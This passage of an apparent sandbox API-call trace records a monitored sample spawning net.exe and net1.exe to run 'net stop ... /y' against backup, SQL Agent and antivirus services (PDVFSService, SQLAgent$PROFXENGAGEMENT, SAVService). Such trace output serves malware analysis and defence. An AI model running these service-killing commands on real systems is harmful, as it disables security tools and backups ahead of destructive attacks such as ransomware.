[0038.968] _wcsicmp (_String1="help", _String2="stop") returned -11 [0038.968] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0038.968] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0038.968] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0038.969] _wcsicmp (_String1="session", _String2="stop") returned -15 [0038.969] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0038.969] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0038.969] _wcsicmp (_String1="share", _String2="stop") returned -12 [0038.969] _wcsicmp (_String1="start", _String2="stop") returned -14 [0038.969] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0038.969] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0038.969] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0038.969] _wcsicmp (_String1="accounts", _String2="PDVFSService") returned -15 [0038.969] _wcsicmp (_String1="computer", _String2="PDVFSService") returned -13 [0038.969] _wcsicmp (_String1="config", _String2="PDVFSService") returned -13 [0038.969] _wcsicmp (_String1="continue", _String2="PDVFSService") returned -13 [0038.969] _wcsicmp (_String1="cont", _String2="PDVFSService") returned -13 [0038.969] _wcsicmp (_String1="file", _String2="PDVFSService") returned -10 [0038.969] _wcsicmp (_String1="files", _String2="PDVFSService") returned -10 [0038.969] _wcsicmp (_String1="group", _String2="PDVFSService") returned -9 [0038.969] _wcsicmp (_String1="groups", _String2="PDVFSService") returned -9 [0038.969] _wcsicmp (_String1="help", _String2="PDVFSService") returned -8 [0038.969] _wcsicmp (_String1="helpmsg", _String2="PDVFSService") returned -8 [0038.969] _wcsicmp (_String1="localgroup", _String2="PDVFSService") returned -4 [0038.969] _wcsicmp (_String1="pause", _String2="PDVFSService") returned -3 [0038.969] _wcsicmp (_String1="session", _String2="PDVFSService") returned 3 [0038.969] _wcsicmp (_String1="sessions", _String2="PDVFSService") returned 3 [0038.969] _wcsicmp (_String1="sess", _String2="PDVFSService") returned 3 [0038.969] _wcsicmp (_String1="share", _String2="PDVFSService") returned 3 [0038.969] _wcsicmp (_String1="start", _String2="PDVFSService") returned 3 [0038.969] _wcsicmp (_String1="stats", _String2="PDVFSService") returned 3 [0038.969] _wcsicmp (_String1="statistics", _String2="PDVFSService") returned 3 [0038.969] _wcsicmp (_String1="stop", _String2="PDVFSService") returned 3 [0038.969] _wcsicmp (_String1="time", _String2="PDVFSService") returned 4 [0038.969] _wcsicmp (_String1="user", _String2="PDVFSService") returned 5 [0038.969] _wcsicmp (_String1="users", _String2="PDVFSService") returned 5 [0038.969] _wcsicmp (_String1="msg", _String2="PDVFSService") returned -3 [0038.969] _wcsicmp (_String1="messenger", _String2="PDVFSService") returned -3 [0038.969] _wcsicmp (_String1="receiver", _String2="PDVFSService") returned 2 [0038.970] _wcsicmp (_String1="rcv", _String2="PDVFSService") returned 2 [0038.970] _wcsicmp (_String1="netpopup", _String2="PDVFSService") returned -2 [0038.970] _wcsicmp (_String1="redirector", _String2="PDVFSService") returned 2 [0038.970] _wcsicmp (_String1="redir", _String2="PDVFSService") returned 2 [0038.970] _wcsicmp (_String1="rdr", _String2="PDVFSService") returned 2 [0038.970] _wcsicmp (_String1="workstation", _String2="PDVFSService") returned 7 [0038.970] _wcsicmp (_String1="work", _String2="PDVFSService") returned 7 [0038.970] _wcsicmp (_String1="wksta", _String2="PDVFSService") returned 7 [0038.970] _wcsicmp (_String1="prdr", _String2="PDVFSService") returned 14 [0038.970] _wcsicmp (_String1="devrdr", _String2="PDVFSService") returned -12 [0038.970] _wcsicmp (_String1="lanmanworkstation", _String2="PDVFSService") returned -4 [0038.970] _wcsicmp (_String1="server", _String2="PDVFSService") returned 3 [0038.970] _wcsicmp (_String1="svr", _String2="PDVFSService") returned 3 [0038.970] _wcsicmp (_String1="srv", _String2="PDVFSService") returned 3 [0038.970] _wcsicmp (_String1="lanmanserver", _String2="PDVFSService") returned -4 [0038.970] _wcsicmp (_String1="alerter", _String2="PDVFSService") returned -15 [0038.970] _wcsicmp (_String1="netlogon", _String2="PDVFSService") returned -2 [0038.970] _wcsupr (in: _String="PDVFSService" | out: _String="PDVFSSERVICE") returned="PDVFSSERVICE" [0038.970] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5254d0 [0038.973] GetServiceKeyNameW (in: hSCManager=0x5254d0, lpDisplayName="PDVFSSERVICE", lpServiceName=0xd2aaf0, lpcchBuffer=0x10f8fc | out: lpServiceName="", lpcchBuffer=0x10f8fc) returned 0 [0038.973] _wcsicmp (_String1="msg", _String2="PDVFSSERVICE") returned -3 [0038.973] _wcsicmp (_String1="messenger", _String2="PDVFSSERVICE") returned -3 [0038.973] _wcsicmp (_String1="receiver", _String2="PDVFSSERVICE") returned 2 [0038.973] _wcsicmp (_String1="rcv", _String2="PDVFSSERVICE") returned 2 [0038.973] _wcsicmp (_String1="redirector", _String2="PDVFSSERVICE") returned 2 [0038.973] _wcsicmp (_String1="redir", _String2="PDVFSSERVICE") returned 2 [0038.974] _wcsicmp (_String1="rdr", _String2="PDVFSSERVICE") returned 2 [0038.974] _wcsicmp (_String1="workstation", _String2="PDVFSSERVICE") returned 7 [0038.974] _wcsicmp (_String1="work", _String2="PDVFSSERVICE") returned 7 [0038.974] _wcsicmp (_String1="wksta", _String2="PDVFSSERVICE") returned 7 [0038.974] _wcsicmp (_String1="prdr", _String2="PDVFSSERVICE") returned 14 [0038.974] _wcsicmp (_String1="devrdr", _String2="PDVFSSERVICE") returned -12 [0038.974] _wcsicmp (_String1="lanmanworkstation", _String2="PDVFSSERVICE") returned -4 [0038.974] _wcsicmp (_String1="server", _String2="PDVFSSERVICE") returned 3 [0038.974] _wcsicmp (_String1="svr", _String2="PDVFSSERVICE") returned 3 [0038.974] _wcsicmp (_String1="srv", _String2="PDVFSSERVICE") returned 3 [0038.974] _wcsicmp (_String1="lanmanserver", _String2="PDVFSSERVICE") returned -4 [0038.974] _wcsicmp (_String1="alerter", _String2="PDVFSSERVICE") returned -15 [0038.974] _wcsicmp (_String1="netlogon", _String2="PDVFSSERVICE") returned -2 [0038.974] NetServiceControl (in: servername=0x0, service="PDVFSSERVICE", opcode=0x0, arg=0x0, bufptr=0x10f8f8 | out: bufptr=0x10f8f8) returned 0x889 [0038.975] wcscpy_s (in: _Destination=0xd2a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0038.975] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74770000 [0038.975] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74770000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xd2b338, nSize=0x800, Arguments=0xd29dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0038.976] GetFileType (hFile=0x26c) returned 0x3 [0038.976] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x524000 [0038.976] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x524000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0038.977] WriteFile (in: hFile=0x26c, lpBuffer=0x524000*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x10f838, lpOverlapped=0x0 | out: lpBuffer=0x524000*, lpNumberOfBytesWritten=0x10f838*=0x1e, lpOverlapped=0x0) returned 1 [0038.977] LocalFree (hMem=0x524000) returned 0x0 [0038.977] GetFileType (hFile=0x26c) returned 0x3 [0038.977] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5262a8 [0038.977] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5262a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nR", lpUsedDefaultChar=0x0) returned 2 [0038.977] WriteFile (in: hFile=0x26c, lpBuffer=0x5262a8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x10f838, lpOverlapped=0x0 | out: lpBuffer=0x5262a8*, lpNumberOfBytesWritten=0x10f838*=0x2, lpOverlapped=0x0) returned 1 [0038.977] LocalFree (hMem=0x5262a8) returned 0x0 [0038.977] _ultow (in: _Dest=0x889, _Radix=1112168 | out: _Dest=0x889) returned="2185" [0038.977] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74770000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xd2b338, nSize=0x800, Arguments=0xd29dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0038.977] GetFileType (hFile=0x26c) returned 0x3 [0038.977] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5262a8 [0038.977] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5262a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0038.977] WriteFile (in: hFile=0x26c, lpBuffer=0x5262a8*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x10f844, lpOverlapped=0x0 | out: lpBuffer=0x5262a8*, lpNumberOfBytesWritten=0x10f844*=0x34, lpOverlapped=0x0) returned 1 [0038.977] LocalFree (hMem=0x5262a8) returned 0x0 [0038.977] GetFileType (hFile=0x26c) returned 0x3 [0038.977] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5262a8 [0038.977] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5262a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nR", lpUsedDefaultChar=0x0) returned 2 [0038.977] WriteFile (in: hFile=0x26c, lpBuffer=0x5262a8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x10f844, lpOverlapped=0x0 | out: lpBuffer=0x5262a8*, lpNumberOfBytesWritten=0x10f844*=0x2, lpOverlapped=0x0) returned 1 [0038.977] LocalFree (hMem=0x5262a8) returned 0x0 [0038.978] NetApiBufferFree (Buffer=0x521c70) returned 0x0 [0038.978] NetApiBufferFree (Buffer=0x521c88) returned 0x0 [0038.978] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop PDVFSService /y" [0038.978] exit (_Code=2) Process: id = "37" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4a632000" os_pid = "0xbd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLAgent$PROFXENGAGEMENT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 105 os_tid = 0xbd8 Process: id = "38" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4970b000" os_pid = "0xbdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "37" os_parent_pid = "0xbd4" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$PROFXENGAGEMENT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 106 os_tid = 0xbe0 [0039.111] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fd00 | out: lpSystemTimeAsFileTime=0x20fd00*(dwLowDateTime=0xe182d5c0, dwHighDateTime=0x1d57a86)) [0039.111] GetCurrentProcessId () returned 0xbdc [0039.111] GetCurrentThreadId () returned 0xbe0 [0039.111] GetTickCount () returned 0x1144c7b [0039.111] QueryPerformanceCounter (in: lpPerformanceCount=0x20fcf8 | out: lpPerformanceCount=0x20fcf8*=15939607143) returned 1 [0039.127] GetModuleHandleA (lpModuleName=0x0) returned 0xe10000 [0039.127] __set_app_type (_Type=0x1) [0039.127] __p__fmode () returned 0x74eb31f4 [0039.128] __p__commode () returned 0x74eb31fc [0039.128] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe1ffe6) returned 0x0 [0039.128] __getmainargs (in: _Argc=0xe29064, _Argv=0xe2906c, _Env=0xe29068, _DoWildCard=0, _StartInfo=0xe29024 | out: _Argc=0xe29064, _Argv=0xe2906c, _Env=0xe29068) returned 0 [0039.128] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0039.128] GetConsoleOutputCP () returned 0x1b5 [0039.128] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe29080 | out: lpCPInfo=0xe29080) returned 1 [0039.128] SetThreadUILanguage (LangId=0x0) returned 0x409 [0039.131] sprintf_s (in: _DstBuf=0x20fcb8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0039.131] setlocale (category=0, locale=".437") returned="English_United States.437" [0039.134] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0039.134] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0039.134] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$PROFXENGAGEMENT /y" [0039.134] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20fa84, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0039.134] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x84) returned 0x274bf8 [0039.134] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0039.134] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x20fc88 | out: Buffer=0x20fc88*=0x271c90) returned 0x0 [0039.134] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x20fc88 | out: Buffer=0x20fc88*=0x271ca8) returned 0x0 [0039.134] _fileno (_File=0x74eb2900) returned -2 [0039.134] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0039.134] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0039.134] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0039.134] _wcsicmp (_String1="config", _String2="stop") returned -16 [0039.134] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0039.134] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0039.134] _wcsicmp (_String1="file", _String2="stop") returned -13 [0039.134] _wcsicmp (_String1="files", _String2="stop") returned -13 [0039.134] _wcsicmp (_String1="group", _String2="stop") returned -12 [0039.134] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0039.134] _wcsicmp (_String1="help", _String2="stop") returned -11 [0039.134] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0039.134] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0039.134] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0039.134] _wcsicmp (_String1="session", _String2="stop") returned -15 [0039.135] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0039.135] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0039.135] _wcsicmp (_String1="share", _String2="stop") returned -12 [0039.135] _wcsicmp (_String1="start", _String2="stop") returned -14 [0039.135] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0039.135] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0039.135] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0039.135] _wcsicmp (_String1="accounts", _String2="SQLAgent$PROFXENGAGEMENT") returned -18 [0039.135] _wcsicmp (_String1="computer", _String2="SQLAgent$PROFXENGAGEMENT") returned -16 [0039.135] _wcsicmp (_String1="config", _String2="SQLAgent$PROFXENGAGEMENT") returned -16 [0039.135] _wcsicmp (_String1="continue", _String2="SQLAgent$PROFXENGAGEMENT") returned -16 [0039.135] _wcsicmp (_String1="cont", _String2="SQLAgent$PROFXENGAGEMENT") returned -16 [0039.135] _wcsicmp (_String1="file", _String2="SQLAgent$PROFXENGAGEMENT") returned -13 [0039.135] _wcsicmp (_String1="files", _String2="SQLAgent$PROFXENGAGEMENT") returned -13 [0039.135] _wcsicmp (_String1="group", _String2="SQLAgent$PROFXENGAGEMENT") returned -12 [0039.135] _wcsicmp (_String1="groups", _String2="SQLAgent$PROFXENGAGEMENT") returned -12 [0039.135] _wcsicmp (_String1="help", _String2="SQLAgent$PROFXENGAGEMENT") returned -11 [0039.135] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$PROFXENGAGEMENT") returned -11 [0039.135] _wcsicmp (_String1="localgroup", _String2="SQLAgent$PROFXENGAGEMENT") returned -7 [0039.135] _wcsicmp (_String1="pause", _String2="SQLAgent$PROFXENGAGEMENT") returned -3 [0039.135] _wcsicmp (_String1="session", _String2="SQLAgent$PROFXENGAGEMENT") returned -12 [0039.135] _wcsicmp (_String1="sessions", _String2="SQLAgent$PROFXENGAGEMENT") returned -12 [0039.135] _wcsicmp (_String1="sess", _String2="SQLAgent$PROFXENGAGEMENT") returned -12 [0039.135] _wcsicmp (_String1="share", _String2="SQLAgent$PROFXENGAGEMENT") returned -9 [0039.135] _wcsicmp (_String1="start", _String2="SQLAgent$PROFXENGAGEMENT") returned 3 [0039.135] _wcsicmp (_String1="stats", _String2="SQLAgent$PROFXENGAGEMENT") returned 3 [0039.135] _wcsicmp (_String1="statistics", _String2="SQLAgent$PROFXENGAGEMENT") returned 3 [0039.135] _wcsicmp (_String1="stop", _String2="SQLAgent$PROFXENGAGEMENT") returned 3 [0039.135] _wcsicmp (_String1="time", _String2="SQLAgent$PROFXENGAGEMENT") returned 1 [0039.135] _wcsicmp (_String1="user", _String2="SQLAgent$PROFXENGAGEMENT") returned 2 [0039.135] _wcsicmp (_String1="users", _String2="SQLAgent$PROFXENGAGEMENT") returned 2 [0039.135] _wcsicmp (_String1="msg", _String2="SQLAgent$PROFXENGAGEMENT") returned -6 [0039.135] _wcsicmp (_String1="messenger", _String2="SQLAgent$PROFXENGAGEMENT") returned -6 [0039.135] _wcsicmp (_String1="receiver", _String2="SQLAgent$PROFXENGAGEMENT") returned -1 [0039.135] _wcsicmp (_String1="rcv", _String2="SQLAgent$PROFXENGAGEMENT") returned -1 [0039.136] _wcsicmp (_String1="netpopup", _String2="SQLAgent$PROFXENGAGEMENT") returned -5 [0039.136] _wcsicmp (_String1="redirector", _String2="SQLAgent$PROFXENGAGEMENT") returned -1 [0039.136] _wcsicmp (_String1="redir", _String2="SQLAgent$PROFXENGAGEMENT") returned -1 [0039.136] _wcsicmp (_String1="rdr", _String2="SQLAgent$PROFXENGAGEMENT") returned -1 [0039.136] _wcsicmp (_String1="workstation", _String2="SQLAgent$PROFXENGAGEMENT") returned 4 [0039.136] _wcsicmp (_String1="work", _String2="SQLAgent$PROFXENGAGEMENT") returned 4 [0039.136] _wcsicmp (_String1="wksta", _String2="SQLAgent$PROFXENGAGEMENT") returned 4 [0039.136] _wcsicmp (_String1="prdr", _String2="SQLAgent$PROFXENGAGEMENT") returned -3 [0039.136] _wcsicmp (_String1="devrdr", _String2="SQLAgent$PROFXENGAGEMENT") returned -15 [0039.136] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$PROFXENGAGEMENT") returned -7 [0039.136] _wcsicmp (_String1="server", _String2="SQLAgent$PROFXENGAGEMENT") returned -12 [0039.136] _wcsicmp (_String1="svr", _String2="SQLAgent$PROFXENGAGEMENT") returned 5 [0039.136] _wcsicmp (_String1="srv", _String2="SQLAgent$PROFXENGAGEMENT") returned 1 [0039.136] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$PROFXENGAGEMENT") returned -7 [0039.136] _wcsicmp (_String1="alerter", _String2="SQLAgent$PROFXENGAGEMENT") returned -18 [0039.136] _wcsicmp (_String1="netlogon", _String2="SQLAgent$PROFXENGAGEMENT") returned -5 [0039.136] _wcsupr (in: _String="SQLAgent$PROFXENGAGEMENT" | out: _String="SQLAGENT$PROFXENGAGEMENT") returned="SQLAGENT$PROFXENGAGEMENT" [0039.136] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2754d0 [0039.139] GetServiceKeyNameW (in: hSCManager=0x2754d0, lpDisplayName="SQLAGENT$PROFXENGAGEMENT", lpServiceName=0xe2aaf0, lpcchBuffer=0x20fc24 | out: lpServiceName="", lpcchBuffer=0x20fc24) returned 0 [0039.139] _wcsicmp (_String1="msg", _String2="SQLAGENT$PROFXENGAGEMENT") returned -6 [0039.139] _wcsicmp (_String1="messenger", _String2="SQLAGENT$PROFXENGAGEMENT") returned -6 [0039.139] _wcsicmp (_String1="receiver", _String2="SQLAGENT$PROFXENGAGEMENT") returned -1 [0039.139] _wcsicmp (_String1="rcv", _String2="SQLAGENT$PROFXENGAGEMENT") returned -1 [0039.139] _wcsicmp (_String1="redirector", _String2="SQLAGENT$PROFXENGAGEMENT") returned -1 [0039.139] _wcsicmp (_String1="redir", _String2="SQLAGENT$PROFXENGAGEMENT") returned -1 [0039.139] _wcsicmp (_String1="rdr", _String2="SQLAGENT$PROFXENGAGEMENT") returned -1 [0039.139] _wcsicmp (_String1="workstation", _String2="SQLAGENT$PROFXENGAGEMENT") returned 4 [0039.139] _wcsicmp (_String1="work", _String2="SQLAGENT$PROFXENGAGEMENT") returned 4 [0039.139] _wcsicmp (_String1="wksta", _String2="SQLAGENT$PROFXENGAGEMENT") returned 4 [0039.139] _wcsicmp (_String1="prdr", _String2="SQLAGENT$PROFXENGAGEMENT") returned -3 [0039.139] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$PROFXENGAGEMENT") returned -15 [0039.139] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$PROFXENGAGEMENT") returned -7 [0039.139] _wcsicmp (_String1="server", _String2="SQLAGENT$PROFXENGAGEMENT") returned -12 [0039.139] _wcsicmp (_String1="svr", _String2="SQLAGENT$PROFXENGAGEMENT") returned 5 [0039.139] _wcsicmp (_String1="srv", _String2="SQLAGENT$PROFXENGAGEMENT") returned 1 [0039.140] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$PROFXENGAGEMENT") returned -7 [0039.140] _wcsicmp (_String1="alerter", _String2="SQLAGENT$PROFXENGAGEMENT") returned -18 [0039.140] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$PROFXENGAGEMENT") returned -5 [0039.140] NetServiceControl (in: servername=0x0, service="SQLAGENT$PROFXENGAGEMENT", opcode=0x0, arg=0x0, bufptr=0x20fc20 | out: bufptr=0x20fc20) returned 0x889 [0039.140] wcscpy_s (in: _Destination=0xe2a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0039.140] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ef0000 [0039.141] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73ef0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe2b338, nSize=0x800, Arguments=0xe29dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0039.142] GetFileType (hFile=0x26c) returned 0x3 [0039.142] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x273ca0 [0039.142] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x273ca0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0039.142] WriteFile (in: hFile=0x26c, lpBuffer=0x273ca0*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x20fb60, lpOverlapped=0x0 | out: lpBuffer=0x273ca0*, lpNumberOfBytesWritten=0x20fb60*=0x1e, lpOverlapped=0x0) returned 1 [0039.142] LocalFree (hMem=0x273ca0) returned 0x0 [0039.142] GetFileType (hFile=0x26c) returned 0x3 [0039.142] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x276298 [0039.142] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x276298, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n'", lpUsedDefaultChar=0x0) returned 2 [0039.142] WriteFile (in: hFile=0x26c, lpBuffer=0x276298*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x20fb60, lpOverlapped=0x0 | out: lpBuffer=0x276298*, lpNumberOfBytesWritten=0x20fb60*=0x2, lpOverlapped=0x0) returned 1 [0039.142] LocalFree (hMem=0x276298) returned 0x0 [0039.142] _ultow (in: _Dest=0x889, _Radix=2161552 | out: _Dest=0x889) returned="2185" [0039.143] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73ef0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe2b338, nSize=0x800, Arguments=0xe29dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0039.143] GetFileType (hFile=0x26c) returned 0x3 [0039.143] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x276298 [0039.143] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x276298, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0039.143] WriteFile (in: hFile=0x26c, lpBuffer=0x276298*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x20fb6c, lpOverlapped=0x0 | out: lpBuffer=0x276298*, lpNumberOfBytesWritten=0x20fb6c*=0x34, lpOverlapped=0x0) returned 1 [0039.143] LocalFree (hMem=0x276298) returned 0x0 [0039.143] GetFileType (hFile=0x26c) returned 0x3 [0039.143] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x276298 [0039.143] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x276298, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n'", lpUsedDefaultChar=0x0) returned 2 [0039.143] WriteFile (in: hFile=0x26c, lpBuffer=0x276298*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x20fb6c, lpOverlapped=0x0 | out: lpBuffer=0x276298*, lpNumberOfBytesWritten=0x20fb6c*=0x2, lpOverlapped=0x0) returned 1 [0039.143] LocalFree (hMem=0x276298) returned 0x0 [0039.144] NetApiBufferFree (Buffer=0x271c90) returned 0x0 [0039.144] NetApiBufferFree (Buffer=0x271ca8) returned 0x0 [0039.144] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$PROFXENGAGEMENT /y" [0039.144] exit (_Code=2) Process: id = "39" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4a637000" os_pid = "0xbe4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SAVService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 107 os_tid = 0xbe8 Process: id = "40" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4936c000" os_pid = "0xbec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0xbe4" cmd_line = "C:\\Windows\\system32\\net1 stop SAVService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS 